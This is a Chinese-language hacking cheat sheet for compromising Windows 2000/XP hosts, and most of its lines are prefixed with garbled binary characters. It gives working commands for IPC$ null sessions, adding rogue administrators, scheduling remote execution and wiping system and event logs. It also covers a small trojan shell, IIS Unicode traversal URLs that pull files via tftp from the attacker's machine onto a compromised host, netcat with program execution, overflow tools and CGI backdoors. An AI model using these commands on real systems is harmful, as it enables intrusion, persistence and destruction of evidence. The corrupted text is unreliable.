网管和黑客都必须知道的命令
w{�W+�WJ 常用的几条NET命令:
x
�7b�y|G( _Z0 ��.c@0 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
-O� *_+�8f [~�{�F(�Le (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
s6|'s�<x"j |eu�8;�~�A (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
1V�gGF^cYR ST?{H �SCz (查看远程主机时间) net time \\IP地址
RK!�9(^�Ja vkE`�T5??� (定时启动某个程序) at \\IP地址 02:18 readme.exe
[K3��
�t�e B r���#�{ (查看共享) net view \\IP地址
:�01d9��|# d0 �)725Ia (查看netbios工作组列表) nbtstat -A IP地址
z}MxMx
c4h ,���m���# (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
hQ@k|3=Re� fmuh��9Z� (这两条把自己增加到管理员组): net user 用户名 密码 /add
�H4y9�\
�- �s�:��tX3X net localgroup Administrators 用户名 /add
a d��qS.xs \t!~s^�Oox (断开连接) net use \\IP地址\ipc$ /delete
]<�^2B��?} ��B�"_O!�� 扫尾:
`>��
%QCc\ ^K<3_D�>1> del C:\winnt\system32\logfiles\*.*
�kG�V�:=h� -�hXKCb4YU del C:\winnt\ssytem32\config\*.evt
%hSQ\T<8[o %�aNm j)L del C:\winnt\system32\dtclog\*.*
�s/7��Z.\� t<U�JR*R=L del C:\winnt\system32\*.log
(m�IjG)4t� 60�~;UBm5O del C:\winnt\system32\*.txt
E�y�:68yU �Z^|�N�]Ej del C:\winnt\*.txt
lI?P_2AaS �g�=t`3X#d del C:\winnt\*.log
��2Xe1qzvo ;�stjqT�d 一、netsvc.exe
G!6b
)�4L- ]Ucw&B*��@ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
^VXhv9\>B ���$9`#p/V netsvc /list \\IP地址
�!h.h�Jt� �I>�;{BYPV netsvc schedule \\IP地址 /query
FaeKDbLJr� uN�)c!=�'I netsvc \\IP地址 schedule /start
�BEOPZ[Q|c inaO{ny �y 二、OpenTelnet.exe
&3�t9�73�= K��U�J�Lx� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
%+l9�5�Dv1 n[Q�(q[ULV OpenTelnet \\IP地址 用户名 密码 1 7878
�b=�5w>��* 7W)W9�=&BT 然后就可以telnet到主机的7878端口,进入DOS方式下:
dL$ iTSfz" $9X�+dvu* telnet IP地址 7878
vc�lc%��ws KA?}o�^-F� 三、winshell.exe
B@�(d5i�{h I�;���w�! 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
?b+Y�])SJK M �2�h�Z'� p Path (查看winshell主程序的路径信息)
$eFMn��$o v*�!N�}1+J b reBoot (重新启动机器)
�#uU(G\�^T y$%oR6�K7- d shutDown (关闭机器)
�#Ki�J�{w' ��=���6�~� s Shell (执行后你就会看到可爱的“C:\>”)
f�n,n�'E�] uA#K59E+� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
."� xP���{ ���RvAgv[8 CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�`�0qj��aC �(���}39f� 四、3389登陆器,GUI方式登录远程主机的
��$b�G*f*w ��1O`�V_d) 五、elsave.exe
m�+�!�.�H\ u1 Q;M`+>� 事件日志清除工具
-*�k2:�i` �q�?� "��> elsave -s \\IP地址 -l "application" -C
�v^ ^I�bv -W9D�H^EL< elsave -s \\IP地址 -l "system" -C
��X\m\yv}} _-C/s�p^�� elsave -s \\IP地址 -l "security" -C
)Dz]Pv]�H' Q�2� !GWz$ 执行后成功清除应用程序日志,系统日志,安全日志
}!_z��\'u� ��Q#3}A�O� 六、hbulot.exe
�3JGrJ��!x �D>��y5�&` 开启win2kserver和winxp的3389服务
"���<=�4]Z $l*���?Ce: hbulot [/r]
>T�]9.`xhK I�$.l�FQ%( 使用/r表示安装完成后自动重起目标使设置生效。
KdkL_GSLT� �C~T�,[�U 七、nc.exe(netcat.exe)
�j;`pAN�(' \(pwHNSafk 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
7�1@�e�JQ a_c(7��bQ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
{P��hq39g� y�z��K<yvN 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
6�]iU-k�0b BSMb(EnqX� 参数:
��/p�<9C?� W!<7OA g�$ -e prog 程序重定向,一旦连接,就执行 [危险!!]
vS�HPN|�*� +U��D�t2�� -g gateway source-routing hop point[s], up to 8
?7�C��m+J� Q!q6R^5!�K -G num source-routing pointer: 4, 8, 12, ...
J+t5�1B(�a c~��tl0XU1 -h 帮助信息
T{�
�@@�V� t�[TM\j0jW -i secs 延时的间隔
r�{.��p�Xf ��=W7-;&�� -l 监听模式,用于入站连接
o:{�Sws(=� ��^g�cB��+ -n 指定数字的IP地址,不能用hostname
Az@@+�?,%Y h)Fc<,vwBE -o file 记录16进制的传输
T��^;b98*� ~u�$�cX1�M -p port 本地端口号
�8�?82 �p �`F/R:!v�� -r 任意指定本地及远程端口
Xb:�*
KeZq �(�xW+* % -s addr 本地源地址
= �vq�J0�! AM�=,:�k$ -u UDP模式
:jv(�-RT�I CtMqE+j�^ -v 详细输出——用两个-v可得到更详细的内容
.bY>++CAPA X�`_t�m3HC -w secs timeout的时间
D4c'6WGb@� bXJ(Q�XHd% -z 将输入输出关掉——用于扫描时
0]5X�T�c3r 八、TFTPD32.EXE
Evj%$7H1L1 JRC2+BU
�/ 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�=)Hu�(;Yv F�Dg�o6x�� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
O>��~@�>/# $�B�?8\>_? 然后可以直接令文件运行:
�T�/���ECW �3�:�xx:Jt http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
4*Hzys�[�{ &S
xF�"pYV 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�;�-"!��p sDBSc:5+e� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
,EHLW��4�v �0V��-jO�c 一、一 Xscan命令行运行参数说明:
b����4w�T3 +pgHCz�wJE 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
$,:mq>]![{ d:iJU�Vpr� 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
<x�Sh�13�< 9nVb$pf�e# xscan -file <主机列表文件名> <检测项目> [其他选项]
�ym5@SBqIx MOh&1]2j5� 其中<检测项目> 含义如下:
4G:~|N.{�p vcj(=\
e8v -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
����m�Ct/\ �c`�x�4."m -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
F�(�.`@OO� ��pf'Db�Y! -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
?�@P�SD\
.l�j5p��mD -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
h�zk!�H]>E s@&3�;{F6D -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
��@{RhO|UR +�a��*Ic8* [其他选项] 含义如下:
�JtY�$A�P$ ]e-Q�N��I� -v: 显示详细扫描进度
���;�3�9a` p�#w�8$Qjp -p: 跳过Ping不通的主机
(PH7�nW�7 :�0�(^^6Q\ -o: 跳过没有检测到开放端口的主机
�pHb,*C</� A�n#[
��+? -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
